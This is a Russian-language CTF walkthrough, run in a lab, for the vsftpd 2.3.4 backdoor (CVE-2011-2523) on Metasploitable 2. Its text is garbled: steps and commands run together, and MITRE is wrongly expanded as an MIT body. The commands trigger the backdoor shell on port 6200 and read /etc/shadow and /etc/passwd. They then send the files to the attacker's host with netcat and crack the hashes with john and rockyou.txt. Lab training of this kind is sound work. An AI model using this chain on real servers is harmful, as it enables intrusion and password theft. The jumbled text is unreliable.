
Пошаговое прохождение CTF с эксплуатацией бэкдора vsftpd 2.3.4 (CVE-2011-2523) для захвата и взлома /etc/shadow и /etc/passwd из Metasploitable 2.
Захватите расшифрованный файл /etc/shadow и /etc/passwd с уязвимого сервера Metasploitable 2.
Для этого CTF мы используем VMware Workstation Pro с двумя виртуальными машинами. Kali Linux выступает в роли машины атакующего, а Metasploitable 2 — в роли уязвимой машины.
Open a Virtual Machine в VMware Workstation и укажите распакованный файл Kali Linuxopen, затем укажите распакованный файл Metasploitable 2Play virtual machine на обеих виртуальных машинахI moved It или I copied It, выберите I copied Itkali в качестве имени пользователя и пароляmsfadmin в качестве имени пользователя и пароляip addr show и запишите IP-адрес из раздела inetMassachusetts Institute of Technology Research and Engineering описывает CVE-2011-2523 как распространённую уязвимость, при которой vsftpd 2.3.4 downloaded between 20110630 and 20110703 contains a backdoor which opens a shell on port 6200/tcp.
nmap <vulnerable-machine-ip-address>nc <vulnerable-machine-ip-address> 21:) на конце, введите user <string>:)pass <string> nc -v <vulnerable-machine-ip-address> 6200ip addr showwhoami/etc/shadow и /etc/passwd в другой файлcp /etc/shadow shadow.txtcp /etc/passwd passwd.txtinet с помощью команды ip addr shownc -l -p 1234 > shadow.txtnc -w 3 <destination-ip> 1234 < shadow.txtJohnunshadow passwd.txt shadow.txt > unshadowed-inputcat unshadowed-input — в нём должны храниться имя пользователя и парольJohn и словаряrockyou.txt для взлома хэшей с помощью johnsudo gzip -d /usr/share/wordlists/rockyou.txt.gzkalijohn unshadowed-input –wordlist=/usr/share/wordlists/rockyou.txtjohn –show unshadowed-input